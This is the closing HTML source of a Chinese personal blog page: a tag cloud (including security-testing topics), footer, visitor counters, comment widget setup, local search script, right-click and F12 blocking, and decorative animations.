href="/tags/%E6%97%A0%E7%BA%BFwifi%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3/" rel="tag">无线wifi密码破解</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%A0%87%E7%AD%BE%E7%9A%84%E4%BD%BF%E7%94%A8/" rel="tag">标签的使用</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a><span class="tag-list-count">10</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%9F%BA%E7%A1%80/" rel="tag">渗透测试基础</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%B7%A5%E5%85%B7/" rel="tag">渗透测试工具</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%B7%A5%E5%85%B7/" rel="tag">漏洞工具</a><span class="tag-list-count">8</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%88%86%E7%A0%B4%E5%B7%A5%E5%85%B7/" rel="tag">爆破工具</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%89%88%E6%9C%AC%E5%85%B1%E5%AD%98/" rel="tag">版本共存</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%9F%A5%E8%AF%86%E6%8B%93%E5%B1%95/" rel="tag">知识拓展</a><span class="tag-list-count">11</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%B7%A5%E5%85%B7/" rel="tag">网络攻防工具</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%8B%B1%E8%AF%AD%E5%9B%9B%E7%BA%A7/" rel="tag">英语四级</a><span class="tag-list-count">8</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%AE%AE%E8%AE%BA%E6%96%87%E4%B8%87%E8%83%BD%E6%A8%A1%E6%9D%BF/" rel="tag">议论文万能模板</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%B0%B7%E6%AD%8C%E8%AF%AD%E6%B3%95/" rel="tag">谷歌语法</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%80%89%E6%8B%A9%E6%8E%92%E5%BA%8F/" rel="tag">选择排序</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%93%BE%E8%A1%A8%E5%AE%9E%E7%8E%B0%E9%98%9F%E5%88%97/" rel="tag">链表实现队列</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%93%BE%E8%A1%A8%E7%9A%84%E5%A2%9E%E5%88%A0%E6%94%B9%E6%9F%A5/" rel="tag">链表的增删改查</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%95%9C%E5%A4%B4/" rel="tag">镜头</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%BB%91%E5%AE%A2%E5%B7%A5%E5%85%B7/" rel="tag">黑客工具</a><span class="tag-list-count">4</span></li></ul>
          </canvas>
      </div>
      </div>
      
      -->
      <!-- 标签云 -->

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2020 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
       <i class="fa fa-heartbeat"></i>
  </span>
  <!--
    <span class="author" itemprop="copyrightHolder"> &nbsp;孤桜懶契</span>
  -->
  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
    <span title="Site words total count">158.4k</span>
  
</div>












  <div class="subscribe-box">

  </div>


        
<div class="busuanzi-count">
  <!--
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  -->
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

   

  
  
    
      <span class="site-uv">
        
        我的第 <span class="busuanzi-value" id="busuanzi_value_site_uv"></span> 位朋友，
      </span>
    

    
      <span class="site-pv">
        历经 <span class="busuanzi-value" id="busuanzi_value_site_pv"></span> 次回眸才与你相遇
        <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      </span>
    
  

</div>








        
      </div>
    </footer>

    
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  










  



  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery@2.1.3/dist/jquery.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/fastclick/1.0.6/fastclick.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/jquery.lazyload/1.9.3/jquery.lazyload.min.js"></script>
  

  
  
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/velocity-animate@1.2.1/velocity.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/npm/velocity-animate@1.2.1/velocity.ui.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script id="ribbon" type="text/javascript" size="60" alpha="0.1"  zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="/js/src/Valine.min.js"></script>

  <!-- https://deserts.io/diy-a-comment-system/ -->
  <script type="text/javascript">
    new Valine({
        lang: 'zh-cn',
        admin_email: 'xxxxxxxxx@qq.com', //博主邮箱
        el: '#comments' ,
        appId: 'HzU5gDhBUYHF8QTF8DmbGhjD-gzGzoHsz',
        appKey: 'wp1HNJ17SdpnE0wIFq99eTKH',
        emoticon_url: 'https://cdn.jsdelivr.net/gh/leafjame/cdn/emoji',
       // emoticon_list: ["吐.png","喷血.png","狂汗.png","不说话.png","汗.png","坐等.png","献花.png","不高兴.png","中刀.png","害羞.png","皱眉.png","小眼睛.png","中指.png","尴尬.png","瞅你.png","想一想.png","中枪.png","得意.png","肿包.png","扇耳光.png","亲亲.png","惊喜.png","脸红.png","无所谓.png","便便.png","愤怒.png","蜡烛.png","献黄瓜.png","内伤.png","投降.png","观察.png","看不见.png","击掌.png","抠鼻.png","邪恶.png","看热闹.png","口水.png","抽烟.png","锁眉.png","装大款.png","吐舌.png","无奈.png","长草.png","赞一个.png","呲牙.png","无语.png","阴暗.png","不出所料.png","咽气.png","期待.png","高兴.png","吐血倒地.png","哭泣.png","欢呼.png","黑线.png","喜极而泣.png","喷水.png","深思.png","鼓掌.png","暗地观察.png"],
        emoticon_list: ["大佬.gif","点赞.gif","尴尬.gif","鼓掌.gif","笑哭.gif","害羞.gif","黑人问号.gif","坏笑.gif","惊吓.gif","可爱.gif","抠鼻子.gif","流汗.gif","色.gif","吐血.gif","无奈.gif","huaji.png","liuhanhuaji.png","mojinghuaji.png","coshuaji.png","shounuehuaji.png","jizhi.png","doge.png","chigua.png","motion_1016.png","motion_1012.png","motion_1017.png","f_hufen.png","f_geili.png","f_jiong.png","f_meng.png","f_shenma.png","f_v5.png","c_onef.png","c_onem.png","c_fivem.png","c_oney.png","c_teny.png","c_oy.png","1f60a.png","1f60b.png","1f60d.png","1f60e.png","1f61a.png","1f62d.png","1f601.png","1f602.png","1f605.png","1f606.png","1f607.png","1f618.png","1f630.png","1f631.png","1f632.png","1f633.png","1f63e.png","1f63f.png","1f638.png","1f639.png","zhayanjian.gif","ciya.gif","xieyanxiao.gif","huaixiao.gif","xiaoku.gif","leiben.gif","penxue.gif","hanxiao.gif","baiyan.gif","cahan.gif","fadai.gif","haixiu.gif","haqian.gif","ku.gif","liuhan.gif","OK.gif","qiang.gif","woshou.gif","baoquan.gif","qiudale.gif","se.gif","yinxian.gif","yun.gif","zaijian.gif"],
        placeholder: '&#x270d;&nbsp;写评论',
  });

  <!--点击邮件中的链接跳转至相应评论-->
  if(window.location.hash){
      var checkExist = setInterval(function() {
         if ($(window.location.hash).length) {
            $('html, body').animate({scrollTop: $(window.location.hash).offset().top-90}, 1000);
            clearInterval(checkExist);
         }
      }, 100);
   }

  </script>






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





    <script>  function addCount(Counter){var $visitors=$('.leancloud_visitors');var url=$visitors.attr('id').trim();var title=$visitors.attr('data-flag-title').trim();Counter('get','/classes/Counter',{where:JSON.stringify({url})}).done(function({results}){if(results.length>0){var counter=results[0]; var $element=$(document.getElementById(url));$element.find('.leancloud-visitors-count').text(counter.time+1);Counter('put','/classes/Counter/'+counter.objectId,JSON.stringify({time:{'__op':'Increment','amount':1}})) .fail(function({responseJSON}){console.log('Failed to save Visitor num, with error message: '+responseJSON.error);})}else{ Counter('post','/classes/Counter',JSON.stringify({title:title,url:url,time:1})).done(function(){var $element=$(document.getElementById(url));$element.find('.leancloud-visitors-count').text(1);}).fail(function(){console.log('Failed to create');});}}).fail(function({responseJSON}){console.log('LeanCloud Counter Error: '+responseJSON.code+' '+responseJSON.error);});}$(function(){$.get('https://app-router.leancloud.cn/2/route?appId='+'HzU5gDhBUYHF8QTF8DmbGhjD-gzGzoHsz').done(function({api_server}){var Counter=function(method,url,data){return $.ajax({method:method,url:'https://'+api_server+'/1.1'+url,headers:{'X-LC-Id':'HzU5gDhBUYHF8QTF8DmbGhjD-gzGzoHsz','X-LC-Key':'wp1HNJ17SdpnE0wIFq99eTKH','Content-Type':'application/json',},data:data});};  const localhost=/http:\/\/(localhost|127.0.0.1|0.0.0.0)/;if(localhost.test(document.URL))return;addCount(Counter);});});</script>

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  


  <!-- Tidio 在线联系功能、鼠标点击特效、页面反馈...-->
  


  
    <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas>
    <script async src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script>
    <script async src="/js/cursor/explosion.min.js"></script>
  



<script>//禁止右键
function click(e) {
if (document.all) {
if (event.button==2||event.button==3) { alert("欢迎光临寒舍，有什么需要帮忙的话，请与站长联系！谢谢您的合作！！！");
oncontextmenu='return false';
}
}
if (document.layers) {
if (e.which == 3) {
oncontextmenu='return false';
}
}
}
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
}
document.onmousedown=click;
document.oncontextmenu = new Function("return false;")
document.onkeydown =document.onkeyup = document.onkeypress=function(){
if(window.event.keyCode == 12) {
window.event.returnValue=false;
return(false);
}
}
</script>


  <script>//禁止F12
function fuckyou(){
window.close(); //关闭当前窗口(防抽)
window.location="https://space.bilibili.com/13563835"; //将当前窗口跳转置空白页
}

function click(e) {
if (document.all) {
  if (event.button==2||event.button==3) {
alert("欢迎光临寒舍，有什么需要帮忙的话，请与站长联系！谢谢您的合作！！！");
oncontextmenu='return false';
}

}
if (document.layers) {
if (e.which == 3) {
oncontextmenu='return false';
}
}
}
if (document.layers) {
fuckyou();
document.captureEvents(Event.MOUSEDOWN);
}
document.onmousedown=click;
document.oncontextmenu = new Function("return false;")
document.onkeydown =document.onkeyup = document.onkeypress=function(){
if(window.event.keyCode == 123) {
fuckyou();
window.event.returnValue=false;
return(false);
}
}
</script>




  
  <script async src="//code.tidio.co/XXXXXXXX.js"></script>







  <script src="/js/src/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>






  <script async language="javascript">

    var div = document.createElement("div");
    //插入到自定义的theme-info或者copyright之后
    var copyright = document.querySelector(".theme-info2") || document.querySelector(".copyright");

    function show_run_time(){
        window.setTimeout("show_run_time()", 1000);
      // BirthDay=new Date("03/07/2020 20:00:00");
        BirthDay=new Date("07/02/2020 10:00:00");
        today=new Date();
        timeold=(today.getTime()-BirthDay.getTime());
        sectimeold=timeold/1000
        secondsold=Math.floor(sectimeold);
        msPerDay=24*60*60*1000
        e_daysold=timeold/msPerDay
        daysold=Math.floor(e_daysold);
        e_hrsold=(e_daysold-daysold)*24;
        hrsold=setzero(Math.floor(e_hrsold));
        e_minsold=(e_hrsold-hrsold)*60;
        minsold=setzero(Math.floor((e_hrsold-hrsold)*60));
        seconds=setzero(Math.floor((e_minsold-minsold)*60));

        // 使用zh-Hans.yml的文字替换
        div.innerHTML = "我已在此等候你 " + "<span style='color: #1890ff'> " + daysold + " </span> 天 <span style='color: #1890ff'>" + hrsold + " </span>时 <span style='color: #1890ff'>" + minsold + " </span>分 <span style='color: #1890ff'>" + seconds + " </span>秒 ";

        document.querySelector(".footer-inner").insertBefore(div, copyright.nextSibling);

    }
    function setzero(i){
        if (i<10)
        {i="0" + i};
        return i;
    }

    show_run_time();

  </script>




<!-- 旋转魔方 -->

   
      
<style>
    .cube_container {
      width: 50px;
      height: 60px;
      margin: 0 auto;
      position: fixed;
      z-index: 999;
      -webkit-perspective: 1000px;
              perspective: 1000px;
      right: 0px;
      bottom: 0px;
      -webkit-transform: translate(-50%, -50%);
              transform: translate(-50%, -50%);
    }

    .cube {
      /*
      width: 100%;
      height: 100%;
      */
      width: 0%; /* 大角度旋转 */
      position: absolute;
      -webkit-transform-style: preserve-3d;
      transform-style: preserve-3d;
      -webkit-transform: rotateX(-15deg) rotateY(-20deg) translateZ(-100px);
      transform: rotateX(-15deg) rotateY(-20deg) translateZ(-100px);
      -webkit-transform-origin: center center -100px;
      transform-origin: center center -100px;
      -webkit-animation: around 5s cubic-bezier(0.94, -0.6, 0.45, 1.31) infinite;
      animation: around 5s cubic-bezier(0.94, -0.6, 0.45, 1.31) infinite;
    }
    .cube div {
      width: 50px;
      height: 50px;
      display: block;
      margin: 0;
      position: absolute;
    }
    .cube div a {
      color: white;
      font-size: 12px;
      text-decoration: none;
      text-align: center;
      position: fixed;
      top: 50%;
      left: 45%;
      -webkit-transform: translate(-50%, -50%);
              transform: translate(-50%, -50%);
    }
    .cube .front {
      -webkit-transform: rotateY(0deg) translateZ(25px);
              transform: rotateY(0deg) translateZ(25px);
      background-color: rgba(0, 191, 255, 0.7);
      border: 1px solid rgba(0, 191, 255, 0.7);
    }
    .cube .back {
      -webkit-transform: rotateX(180deg) translateZ(25px);
              transform: rotateX(180deg) translateZ(25px);
      background-color: rgba(124, 252, 0, 0.7);
      border: 1px solid rgba(124, 252, 0, 0.7);
    }
    .cube .left {
      -webkit-transform: rotateY(-90deg) translateZ(25px);
              transform: rotateY(-90deg) translateZ(25px);
      background-color: rgba(255, 215, 0, 0.7);
      border: 1px solid rgba(255, 215, 0, 0.7);
    }
    .cube .right {
      -webkit-transform: rotateY(90deg) translateZ(25px);
              transform: rotateY(90deg) translateZ(25px);
      background-color: rgba(255, 69, 0, 0.7);
      border: 1px solid rgba(255, 69, 0, 0.7);
    }
    .cube .top {
      -webkit-transform: rotateX(90deg) translateZ(25px);
              transform: rotateX(90deg) translateZ(25px);
      background-color: rgba(255, 0, 157, 0.7);
      border: 1px solid rgba(255, 0, 157, 0.7);
    }
    .cube .bottom {
      -webkit-transform: rotateX(-90deg) translateZ(25px);
              transform: rotateX(-90deg) translateZ(25px);
      background-color: rgba(184, 111, 220, 0.7);
      border: 1px solid rgba(184, 111, 220, 0.7);
    }

     @-webkit-keyframes around {
      100% {
        -webkit-transform: rotateX(-15deg) rotateY(-380deg) translateZ(-100px);
                transform: rotateX(-15deg) rotateY(-380deg) translateZ(-100px);
      }
    }

    @keyframes around {
      100% {
        -webkit-transform: rotateX(-15deg) rotateY(-380deg) translateZ(-100px);
        transform: rotateX(-15deg) rotateY(-380deg) translateZ(-100px);
      }
    }
</style>

<div class="cube_container">
	  <div class="cube">
	    <div class="front"><a onclick="back2top()" rel="nofollow"> 欢迎光临 </a></div>
	    <div class="back"><a onclick="back2top()" rel="nofollow"> ❤️ </a></div>
	    <div class="right"><a onclick="back2top()" rel="nofollow"> 孤桜懶契 </a></div>
	    <div class="GYLQ"><a onclick="back2top()" role="button" rel="nofollow"> 请多关照 </a></div>
	    <div class="top"><a href="https://github.com/GYLQ/GYLQ.github.io" target="_blank" rel="nofollow"> ❤️ </a></div>
	    <div class="bottom"><a href="https://github.com/GYLQ/GYLQ.github.io" target="_blank" rel="nofollow"> ❤️ </a></div>
	  </div>
</div>

<script>

  function back2top(){
    $('html, body').animate({scrollTop: 0}, 500);
  }

</script>

   


<!-- Console 输出第三方个性化字体 -->

  <script async type="text/javascript" src="/figlet/fetch.min.js"></script>
  <script type="text/javascript" src="/figlet/figlet.js"></script>
  <script type="text/javascript">

      figlet.defaults({fontPath: "/figlet/fonts"});
      figlet("Welcome To Leaface", "Big Money-ne", function(err, text) {
          if (err) {
              console.log("something went wrong...");
              console.dir(err);
              return;
          }
          console.log(text);
      });
  </script>


  <!-- Console 输出自定义字体 -->
  
    <script async type="text/javascript">
        var text = "Welcome To Leaface";
        var date = '2021-08-02';
        console.log("%c " + text, "font-size:100px;color:white;border-radius:20px;height:200px; background:-webkit-linear-gradient(yellow,orange,red,green,blue,purple);text-shadow: 0 1px 0 #ccc,0 2px 0 #c9c9c9,0 3px 0 #bbb,0 4px 0 #b9b9b9,0 5px 0 #aaa,0 6px 1px rgba(0,0,0,.1),0 0 5px rgba(0,0,0,.1),0 1px 3px rgba(0,0,0,.3),0 3px 5px rgba(0,0,0,.2),0 5px 10px rgba(0,0,0,.25),0 10px 10px rgba(0,0,0,.2),0 20px 20px rgba(0,0,0,.15);");
        console.info('\n' + ' %c Leafae Site %c https://www.liaofuzhan.com ' + '\n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;');
        console.info('\n' + ' %c Leafae QQ %c 793458585 ' + '\n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;');
        console.info('\n' + ' %c Leafae Wechat %c leaface ' + '\n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;');
       // console.log("%c Time: " + date, "font-size:100px;white:"+fcolor+";border-radius:20px;height:200px; background:-webkit-linear-gradient(yellow,orange,red,green,blue,purple);text-shadow: 0 1px 0 #ccc,0 2px 0 #c9c9c9,0 3px 0 #bbb,0 4px 0 #b9b9b9,0 5px 0 #aaa,0 6px 1px rgba(0,0,0,.1),0 0 5px rgba(0,0,0,.1),0 1px 3px rgba(0,0,0,.3),0 3px 5px rgba(0,0,0,.2),0 5px 10px rgba(0,0,0,.25),0 10px 10px rgba(0,0,0,.2),0 20px 20px rgba(0,0,0,.15);  background-image: linear-gradient(to right, orangered, orange, gold, lightgreen, cyan, dodgerblue, mediumpurple, hotpink, orangered);");
       // console.log("%c .", "padding:300px 600px;line-height:10px;background:url(https://s2.ax1x.com/2019/10/17/KkoAJJ.md.png) no-repeat;");
    </script>
  


  <!-- 看板娘 -->
  
      <script async src="/live2d-widget/autoload.js"></script>
  

  

  

  <!-- 代码块复制功能 -->
  <script async type="text/javascript" src="/js/src/clipboard.min.js"></script>
  <script async type="text/javascript" src="/js/src/clipboard-use.js"></script>

  <!--share.js-->
  <link async rel="stylesheet" href="/sharejs/css/share.min.css">
  <script async src="/sharejs/js/social-share.min.js"></script>

  <!-- 模仿知乎卡片样式链接、崩溃欺骗特效 -->
  <script async type="text/javascript" src="/js/src/linkcard.js"></script>

  <!--崩溃欺骗 放在js文件最后-->
  <!--
  <script type="text/javascript" src="/js/src/crash_cheat.js"></script>
  -->

 
    <script src="https://player.lmih.cn/player/js/player.js" id="myhk" key="159368326389" m="1"></script>
 

</body>
</html>
